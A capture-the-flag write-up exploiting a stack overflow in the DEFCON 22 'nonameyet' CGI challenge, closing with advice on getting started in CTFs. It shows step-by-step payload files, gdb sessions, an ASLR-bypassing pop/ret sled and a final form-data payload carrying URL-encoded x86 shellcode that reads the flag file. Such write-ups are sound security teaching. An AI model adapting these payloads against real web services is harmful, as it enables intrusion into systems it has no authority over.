The bug comes in if we make the length of Time larger than the length of file_name while having file_name reference %Time%. There is no check to see if we have enough stack space left. This is a stack overflow. The only issue is that if we try to encode a %Time% variable directly into the file_name then the program never gets to the interesting function! For clarity, this is what the formdata file looks like now for testing:

-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%Time%"
Content-Type: application/octet-stream

file contents
-----------------------------13141138687192
-----------------------------13141138687192
Content-Disposition: form-data; name="Time"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----------------------------13141138687192--

The %Time% bit does not parse correctly and we miss the check for % in the filename. This is because the variables are being URL decoded. If I set it to %25Time%25 it will decode properly as %Time% (0x25 = ‘%’). The other problem I ran into with this input is that, although the %Time% variable in the filename is case sensitive, the form field is looked up in lower case only when the time pointers and sizes are set in the structure. So, name=”time” and filename=”%25Time%25” will produce the following crash:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x1000
ECX: 0x41414141 ('AAAA')
EDX: 0x80500a6 --> 0x0
ESI: 0x41414141 ('AAAA')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ('A' <repeats 46 times>)
ESP: 0xbffff60a ('A' <repeats 92 times>)
EIP: 0x804cfa2 (rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9a: mov    edi,eax
   0x804cf9c: mov    esi,DWORD PTR [ebp-0x14]
   0x804cf9f: mov    ecx,DWORD PTR [ebp-0x18]
=> 0x804cfa2: rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4: mov    ebx,DWORD PTR [ebp+0x8]
   0x804cfa7: mov    DWORD PTR [ebx],eax
   0x804cfa9: mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac: mov    DWORD PTR [ebx+0x4],eax
[------------------------------------stack-------------------------------------]
0000| 0xbffff60a ('A' <repeats 92 times>)
0004| 0xbffff60e ('A' <repeats 88 times>)
0008| 0xbffff612 ('A' <repeats 84 times>)
0012| 0xbffff616 ('A' <repeats 80 times>)
0016| 0xbffff61a ('A' <repeats 76 times>)
0020| 0xbffff61e ('A' <repeats 72 times>)
0024| 0xbffff622 ('A' <repeats 68 times>)
0028| 0xbffff626 ('A' <repeats 64 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804cfa2 in ?? ()
gdb-peda$

Huzzah! We’ve exercised the stack overflow and crashed on a memcpy(). If we can get the function to return we will have control over EIP. We are actually really close to the function return at this point as well. The ret instruction is at 0x0804CFB0, just a short 14 bytes away.

Let’s see if we can get around this crash. The rep movs instruction will move ECX number of bytes from the pointer in ESI to the pointer in EDI. Here, ECX is set to 0x41414141. Clearly we overwrote the size used in this copy. We could look at the stack frame and do the math with the allocas to figure out exactly which offset the counter is coming from, but it is faster to just put in a string pattern in the time variable.

We run it again with formdata of:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents
-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV
-----------------------------13141138687192

Debugging this gives us the following:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x1000
ECX: 0x47474646 ('FFGG')
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ("LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")
ESP: 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")
EIP: 0x804cfa2 (rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9a: mov    edi,eax
   0x804cf9c: mov    esi,DWORD PTR [ebp-0x14]
   0x804cf9f: mov    ecx,DWORD PTR [ebp-0x18]
=> 0x804cfa2: rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4: mov    ebx,DWORD PTR [ebp+0x8]
   0x804cfa7: mov    DWORD PTR [ebx],eax
   0x804cfa9: mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac: mov    DWORD PTR [ebx+0x4],eax
[------------------------------------------------------------------------------]
Stopped reason: SIGSEGV
0x0804cfa2 in ?? ()
gdb-peda$
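The register values in this crash map straight back to offsets in the pattern. A small sketch of that lookup, assuming the same AAAABBBB...VVVV pattern as the formdata file above (offset_of_register is a hypothetical helper name):

```python
import string
import struct

# Four copies of each letter A through V, matching the time value above.
PATTERN = "".join(letter * 4 for letter in string.ascii_uppercase[:22])


def offset_of_register(value: int, pattern: str = PATTERN) -> int:
    """Return the pattern offset of a 32-bit register value, or -1."""
    # The register was loaded little-endian, so unpack it the same way.
    chunk = struct.pack("<I", value).decode("ascii")
    return pattern.find(chunk)


if __name__ == "__main__":
    print("ECX (copy length):", offset_of_register(0x47474646))
    print("ESI (copy source):", offset_of_register(0x48484747))
```

The two offsets come out 4 bytes apart, which agrees with the [ebp-0x18] and [ebp-0x14] loads in the disassembly.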

We can go back to our input file and replace the “FFGG” with NULLs so that no copy is executed. My first attempt was to inject raw NULL bytes into this file. I ran the following python script to get the job done. It’s not pretty, but it worked. I could also have used vi with %!xxd and %!xxd -r or any other hex editor to make these changes.

$ python
Python 2.7.5+ (default, Feb 27 2014, 19:39:55)
[GCC 4.8.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = open("formdata", "rb")
>>> t = a.read()
>>> t.find("FFGG")
286
>>> l = t.find("FFGG")
>>> t[l:l+4]
'FFGG'
>>> def strow(instr, owstr, offset):
...     return instr[:offset] + owstr + instr[offset+len(owstr):]
...
>>> p = strow(t, "\0\0\0\0", 286)
>>> y = open("file2", "wb")
>>> y.write(p)
>>> y.close()

While the python script properly modified the file, this technique did not work. ECX, instead of NULL, was set to 0x2d2d2d2d or “----”. This value is coming from our boundary on the multipart data. I assumed that because we used NULL bytes that they must be causing early termination of string parsing routines. What if we URL encode the NULL bytes?

Setting the time variable to “AAAABBBBCCCCDDDDEEEEFF%00%00%00%00GGHHHHIIII” and debugging once again yields:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Content-type: text/html
Cookie: AA==
<p>ERROR: 906</p><meta http-equiv='refresh' content='0;url=../thanks.php'>
[Inferior 1 (process 1834) exited normally]
Warning: not running or target is remote
gdb-peda$

Well that was a step in the wrong direction! There is no crash now. We are seeing the ERROR: 906 coming back, which is what happens when the photo file being uploaded fails to open. The cookie coming back to us in the HTTP header is the name of this file. The base64 decoding of “AA==“ is 0x00, so it is understandable that that file did not open. I think we are running into similar issues with the string parsing again. This is as far as I got during the actual CTF.
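The cookie value is easy to check by hand. A tiny sketch, assuming the cookie is standard base64 of the filename as described above (cookie_to_filename is a hypothetical helper name):

```python
import base64


def cookie_to_filename(cookie: str) -> bytes:
    """Decode the Cookie header value back into the raw filename bytes."""
    return base64.b64decode(cookie)


if __name__ == "__main__":
    # A single NUL byte: the filename was cut off at the first decoded %00.
    print(cookie_to_filename("AA=="))
```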

It was not until afterwards that it was pointed out to me that we can double URL encode the NULL values. If URL encoding once makes 0x00 = %00 then URL encoding twice will be 0x00 = %00 = %25%30%30. With my formdata file now looking like this:

-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents
-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP
-----------------------------13141138687192
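The double encoding in this file can be sanity-checked with Python's standard percent-decoder. This is only a sketch: the CGI's own decoder is not shown here, so I am assuming it behaves like urllib's and that the value passes through two decode steps (decode_passes is a hypothetical helper name).

```python
from urllib.parse import unquote_to_bytes


def decode_passes(field: bytes, passes: int) -> bytes:
    """Apply percent-decoding to `field` the given number of times."""
    for _ in range(passes):
        field = unquote_to_bytes(field)
    return field


if __name__ == "__main__":
    encoded = b"%25%30%30"
    print(decode_passes(encoded, 1))        # still text after one pass
    print(decode_passes(encoded, 2))        # a raw NUL after two passes
    print(decode_passes(b"%25Time%25", 1))  # the filename trick from earlier
```

After one pass the NUL is still the harmless text %00, so a string routine in between would not truncate on it; only the second pass produces the raw byte.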

We get a debugger output of:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x4f4f4e4e ('NNOO')
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ("LLMMMMNNNNOOOOPPPP")
ESP: 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
EIP: 0x804cfa7 (mov DWORD PTR [ebx],eax)
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9f: mov    ecx,DWORD PTR [ebp-0x18]
   0x804cfa2: rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4: mov    ebx,DWORD PTR [ebp+0x8]
=> 0x804cfa7: mov    DWORD PTR [ebx],eax
   0x804cfa9: mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac: mov    DWORD PTR [ebx+0x4],eax
   0x804cfaf: leave
   0x804cfb0: ret
[------------------------------------stack-------------------------------------]
0000| 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
0004| 0xbffff60e ("BBBBCCCCDDDDEEEEFF")
0008| 0xbffff612 ("CCCCDDDDEEEEFF")
0012| 0xbffff616 ("DDDDEEEEFF")
0016| 0xbffff61a ("EEEEFF")
0020| 0xbffff61e --> 0x4646 ('FF')
0024| 0xbffff622 --> 0x47470000 ('')
0028| 0xbffff626 ("HHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804cfa7 in ?? ()
gdb-peda$

Awesome, we got past the rep movs with a NULL ECX and we are now 9 bytes away. The crash is now on the instruction 0x804cfa7: mov DWORD PTR [ebx],eax where EBX is 0x4f4f4e4e. We are writing EAX to this pointer. We can set this to be anywhere in memory that is writeable to avoid this crash. At the offset for “NNOO” let’s put in 0x0804F0EC, which is just past the end of the .BSS section. That address is mapped into our memory space and will be NULL and unused throughout the program. We will need to little endian encode and URL encode this pointer resulting in: %EC%F0%04%08.
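Encoding pointers by hand is error-prone, so here is a minimal sketch of the conversion just described: pack the address little-endian, then percent-encode every byte. The function name url_encode_pointer is mine, not part of any tool used here.

```python
import struct


def url_encode_pointer(address: int) -> str:
    """Little-endian pack a 32-bit address and percent-encode each byte."""
    raw = struct.pack("<I", address)
    return "".join(f"%{byte:02X}" for byte in raw)


if __name__ == "__main__":
    print(url_encode_pointer(0x0804F0EC))
```

Percent-encoded hex digits are case-insensitive, so upper- and lower-case output decode to the same bytes.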

Now with a formdata file of:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents
-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP
-----------------------------13141138687192

We get a debugger output of:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x804f0ec --> 0xb7fd9000 --> 0x0
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0x4d4d4c4c ('LLMM')
ESP: 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
EIP: 0x4e4e4d4d ('MMNN')
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x4e4e4d4d
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
0004| 0xbffff644 ("OOPPPP")
0008| 0xbffff648 --> 0xff005050
0012| 0xbffff64c --> 0x1
0016| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0020| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0024| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0028| 0xbffff65c --> 0x80500a0 ("%Time%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x4e4e4d4d in ?? ()
gdb-peda$

Excellent! EIP: 0x4e4e4d4d. I can now control the next instruction that this program executes. Our goal is to send EIP back to a buffer that we control. Let’s find everywhere in memory that our input string exists:

gdb-peda$ searchmem AAAABBBB
Searching for 'AAAABBBB' in: None ranges
Found 3 results, display max 3 items:
 [heap] : 0x80501b8 ("AAAABBBBCCCCDDDDEEEEFF")
 mapped : 0xb7fda108 ("AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP\r\n", '-' <repeats 29 times>, "13141138687192--\r\n")
[stack] : 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
gdb-peda$ vmmap
Start      End        Perm Name
0x08048000 0x0804e000 r-xp /home/bool/nonameyet.cgi
0x0804e000 0x0804f000 r-xp /home/bool/nonameyet.cgi
0x0804f000 0x08050000 rwxp /home/bool/nonameyet.cgi
0x08050000 0x08071000 rwxp [heap]
0xb7e1e000 0xb7e1f000 rwxp mapped
0xb7e1f000 0xb7fcd000 r-xp /lib/i386-linux-gnu/libc-2.17.so
0xb7fcd000 0xb7fcf000 r-xp /lib/i386-linux-gnu/libc-2.17.so
0xb7fcf000 0xb7fd0000 rwxp /lib/i386-linux-gnu/libc-2.17.so
0xb7fd0000 0xb7fd3000 rwxp mapped
0xb7fd9000 0xb7fdd000 rwxp mapped
0xb7fdd000 0xb7fde000 r-xp [vdso]
0xb7fde000 0xb7ffe000 r-xp /lib/i386-linux-gnu/ld-2.17.so
0xb7ffe000 0xb7fff000 r-xp /lib/i386-linux-gnu/ld-2.17.so
0xb7fff000 0xb8000000 rwxp /lib/i386-linux-gnu/ld-2.17.so
0xbffdf000 0xc0000000 rwxp [stack]

I have three choices for direct execution: heap, mapped, or stack. All of the sections are executable. If I run the binary again and do the same search we can determine if any of these sections are affected by ASLR. They all looked stable between runs to me. Remember this for later.

My preference is to use the mapped section because it looks like it has a complete copy of the data exactly as I sent it in. Other options here are to look for more input vectors, specifically cookies and other variables. Let’s use python again to set the “AAAA” in our input to \xcc\xcc\xcc\xcc so that we might trigger an int 3 debugging break point.

Next, let’s overwrite the “MMNN” offset that was in EIP with the little endian URL encoded address of %08%a1%fd%b7 (0xb7fda108) that should point directly to the start of our data (int 3) in the mapped section. If all goes well, we should expect to see a SIGTRAP.

The formdata file is:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents
-----------------------------13141138687192
Content-Disposition: form-data; name="time"

▒▒▒▒BBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%08%a1%fd%b7%EC%F0%04%08OOPPPP
-----------------------------13141138687192

The debugger output is:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x804f0ec --> 0xb7fd9000 --> 0x0
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0x4d4d4c4c ('LLMM')
ESP: 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
EIP: 0xb7fda109 --> 0x42cccccc
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7fda0fc: gs
   0xb7fda0fd: cmp    eax,0x6d697422
   0xb7fda102: and    cl,BYTE PTR gs:0xcc0a0d0a
=> 0xb7fda109: int3
   0xb7fda10a: int3
   0xb7fda10b: int3
   0xb7fda10c: inc    edx
   0xb7fda10d: inc    edx
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
0004| 0xbffff644 ("OOPPPP")
0008| 0xbffff648 --> 0xff005050
0012| 0xbffff64c --> 0x1
0016| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0020| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0024| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0028| 0xbffff65c --> 0x80500a0 ("%Time%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0xb7fda109 in ?? ()
gdb-peda$

Great! We have arbitrary code execution now. Unfortunately, the start of our string only affords us 22 bytes of execution before we run into the NULL encoded ECX register from earlier. We now have two options. The first is to make the filename larger than %25Time%25 so that more stack is allocated and our offsets are further into the file. The second option I see is to encode a short relative jump instruction in place of the int 3. Because we are doing this from a flat file and not an exploit script it would be very easy to lose track of shifting offsets, so I opted for the second option.

Currently, the start of the “OOPP” that ends our input string is 105 bytes away. I can encode a jump as %eb%67 to jump +105 bytes forward and land right on my data. After a bit of trial and error building the input file I was able to line everything up just right and gain code execution when running in gdb. I simply replaced the “OOPPPP” with my shellcode to open /home/nonameyet/flag, read it to the stack, and write it to stdout. Note that this shellcode would not trigger the .bash_alias backdoor from earlier!

However, when I run it outside of the debugger I get a segmentation fault. This is a common annoyance when writing exploits. Things can change when they are being debugged. I ran a strace command to see if any of the shellcode was making system calls:

$ ./nonameyet.cgi < formdata2
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0xb76ff000
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xb7fda108} ---
+++ killed by SIGSEGV (core dumped) +++

Nope, I never got execution. With si_addr=0xb7fda108 I am at least still jumping to the correct spot. What I notice is that the mmap call is returning 0xb76ff000. This is not what I was seeing as a consistent address for my data on the 0xb7fda000 page. So, that address does not exist and we need to go back to pick one of the other two points where we have code. Let’s pick the heap this time with an address of 0x080501b8 as our new EIP.

After modifying the formdata file again and setting a break point on the return from the interesting function, it looks like the heap address has moved as well. It is now at [heap] : 0x8050318 (“AAAABBBBCCCCDDDDEEEEFF”). I suggest that this changed because our input lengths have changed since I last looked. I’ve added shellcode now after all.

The base address for the heap is still in the same spot: 0x08050000. It is just the offset within that page that has shifted. Let’s put in the new address for EIP and try our luck with yet another run. The other thing that is different about this heap location is that all of our data has already been URL decoded. Thus, we will need to URL encode all of our binary values. This includes the shellcode.

This time it hits a SIGTRAP again and we can redo our relative short jump calculation to land on arbitrary shellcode. We are executing at 0x08050318 and we need to jump to 0x08050352, which is 58 bytes away. A short jump is measured from the end of its own two bytes, so we should use an opcode of “\xeb\x38”. Setting this at the start jumps perfectly to our shellcode, which now executes just fine in the debugger. Again.
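Both short jump calculations so far follow the same rule: the one-byte displacement counts from the end of the two-byte instruction. A minimal sketch of that arithmetic (short_jump is a hypothetical helper name, not something from the exploit itself):

```python
def short_jump(distance: int) -> bytes:
    """Encode an x86 short jump landing `distance` bytes past its first byte."""
    # The rel8 displacement is relative to the instruction after the jump,
    # and the jump itself is two bytes long (opcode 0xEB plus displacement).
    rel8 = distance - 2
    if not -128 <= rel8 <= 127:
        raise ValueError("target is out of range for a short jump")
    return bytes([0xEB, rel8 & 0xFF])


if __name__ == "__main__":
    print(short_jump(105).hex())                      # mapped-section attempt
    print(short_jump(0x08050352 - 0x08050318).hex())  # heap attempt
```

Anything further than 127 bytes forward needs a near jump or a second hop, which is one more reason to keep the payload compact.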

But, once again, running without the debugger attached produces a crash! It appears that the heap moves as well. This makes logical sense. If the mmap call is moving and the heap is allocated in a similar way, then they both should move with ASLR. We could try the stack location by building in a large NOP (\x90) sled before our shellcode and go about guessing stack addresses despite ASLR, brute forcing the return address used for EIP. I’ve shamefully used this technique in past CTF events with success.

The whole problem here, and the reason I’ve failed to exploit twice, is that GDB has disabled ASLR. Remember when I checked it earlier? I could have saved myself a lot of time if I had realized this back then. While having your debugger turn off ASLR makes debugging easier, it leads to false hope. Let this be a lesson to always run the set disable-randomization off command in GDB when starting exploit development on a binary. I believe this default ASLR disabled state is actually coming from the PEDA GDB init script I am using. I have another idea that should work with ASLR.

Remember that data structure passed into the interesting function? Well, there is no reason why we only have to fill out the “filename” and “time” variables. If we set the “date” variable there will be a pointer to the date value on the stack. We can put our shellcode in there and use a technique called a return sled to get down the stack.

Here is a short debugging session showing the stack at the beginning of the interesting function:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ break *0x0804CE3B
Breakpoint 1 at 0x804ce3b
gdb-peda$ set args < formdata3
gdb-peda$ r
Breakpoint 1, 0x0804ce3b in ?? ()
gdb-peda$ stack 20
0000| 0xbffff63c --> 0x80492eb (test eax,eax)  # return address in main()
0004| 0xbffff640 --> 0xbffff65c --> 0x80500a0 ("%Time%")
0008| 0xbffff644 --> 0xbffff68c --> 0xe
0012| 0xbffff648 --> 0xffffffff
0016| 0xbffff64c --> 0x1
0020| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0024| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0028| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0032| 0xbffff65c --> 0x80500a0 ("%Time%")
0036| 0xbffff660 --> 0x7
0040| 0xbffff664 --> 0x0
0044| 0xbffff668 --> 0x0
0048| 0xbffff66c --> 0x80501b8 --> 0x414138eb  # this is the time variable
0052| 0xbffff670 --> 0x3b (';')  # time variable length
0056| 0xbffff674 --> 0x8050348 --> 0xf0ec8166  # date variable
0060| 0xbffff678 --> 0x54 ('T')  # date variable length
0064| 0xbffff67c --> 0x0
0068| 0xbffff680 --> 0x0
0072| 0xbffff684 --> 0x0
0076| 0xbffff688 --> 0x0
gdb-peda$

If we replace our original return address with 0x08048945 (the address of a ret instruction) and then immediately following this address place the same address again, the program will return twice and the stack pointer will be incremented by 8. We can do this all the way down the stack until we reach our pointer to the date variable. A little math, (0xbffff674 - 0xbffff63c) / 4 = 14, tells us that we need to put the pointer to the ret instruction on the stack 14 times to reach the pointer to our shellcode.

One problem. When I go to edit the time variable I see that we have <eip> then <bss> address in the time variable. This was required to survive the write from earlier. I will not be able to write to the text section of the binary so I cannot use this address for the ret sled. Because the number of addresses is even, I can point the return sled to a pop ret gadget and have a pop/ret sled instead. There is a pop just one byte before the previous ret address at 0x08048944. I will still need to put this address in 14 times but every other instance will not be executed.
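To convince myself the pop/ret sled lines up, it helps to walk the stack slots on paper. Here is a rough Python sketch of that walk. The slot addresses come from the stack dump above; the helper names sled_slots and walk are hypothetical, and the model only tracks which 4-byte slots are consumed by ret versus pop, nothing else about the CPU.

```python
RET_ADDR_SLOT = 0xBFFFF63C  # saved return address, from the stack dump
DATE_PTR_SLOT = 0xBFFFF674  # pointer to the date value, from the stack dump
POP_RET = 0x08048944        # address of the pop; ret gadget
BSS = 0x0804F0EC            # writable address needed right after the new EIP


def sled_slots() -> list:
    """Build the overwritten slots from the return address downward."""
    count = (DATE_PTR_SLOT - RET_ADDR_SLOT) // 4
    slots = [POP_RET] * count
    slots[1] = BSS  # survives the earlier write; only ever popped
    return slots


def walk(slots: list) -> tuple:
    """Return (slots taken by ret, slots taken by pop, first slot past the sled)."""
    executed, popped = [], []
    index = 0
    while index < len(slots) and slots[index] == POP_RET:
        executed.append(index)        # ret jumps to the gadget
        if index + 1 < len(slots):
            popped.append(index + 1)  # the gadget's pop discards the next slot
        index += 2                    # the gadget's ret takes the one after
    return executed, popped, index


if __name__ == "__main__":
    slots = sled_slots()
    executed, popped, landing = walk(slots)
    print(len(slots), "slots; ret consumes", executed, "pop consumes", popped)
    print("next ret reads slot at", hex(RET_ADDR_SLOT + 4 * landing))
```

The bss address sits in a popped slot, so it is never used as a return target, and the walk ends with the next ret reading the date pointer's slot.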

My first attempt at this failed as well! When I looked at the stack, the pointer for the “date” variable was not where it should be. The length was correct but we were returning into NULLs. Looking a little closer, I noticed that the pointer for this variable ended with 0x00. Of course, the time variable was null terminating on the stack. My length was off by one. Since I am already doing a pop/ret sled the pointer immediately before the date pointer is not executed. It could really be anything. I made the time variable one byte shorter and FINALLY gained code execution outside of a debugger. Here is the completed formdata file and execution printing out /home/nonameyet/flag:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents
-----------------------------13141138687192
Content-Disposition: form-data; name="time"

%eb%38AABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%44%89%04%08%EC%F0%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04
-----------------------------13141138687192
Content-Disposition: form-data; name="date"

%66%81%EC%F0%01%83%E4%F8%EB%30%5E%89%F3%31%C9%31%C0%B0%05%CD%80%89%C3%89%F1%31%D2%B2%FF%31%C0%B0%03%CD%80%BB%FF%FF%FF%FF%F7%DB%89%F1%88%C2%31%C0%B0%04%CD%80%31%C0%B0%01%CD%80%E8%CB%FF%FF%FF%2F%68%6F%6D%65%2F%6E%6F%6E%61%6D%65%79%65%74%2F%66%6C%61%67%00
-----------------------------13141138687192--
$ ./nonameyet.cgi < formdata
AngryRhinocerosAndthenIfoundfivedollars.

The only thing left to do is to send this over a socket to the web server so that I can pull back the flag on the remote system. Too bad the service was offline by the time I completed the challenge.

There are other ways to go about landing this stack overflow. Another public write up is here (in Chinese). It looks like this team made a ROP chain to getenv() that would read in cookie data. The same stack overflow bug was used.

Big thanks to HJ and Legit BS for a fun CTF problem. I spent way too much time playing with it. If you enjoyed this walk through or have questions or comments, you are welcome to email me: svittitoe at endgame.com.

How to Get Started in CTF


Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time.

If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging.

If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started.

1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “switch” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include:

2) Cryptography. While this is not my personal strength, here are some resources to check out:

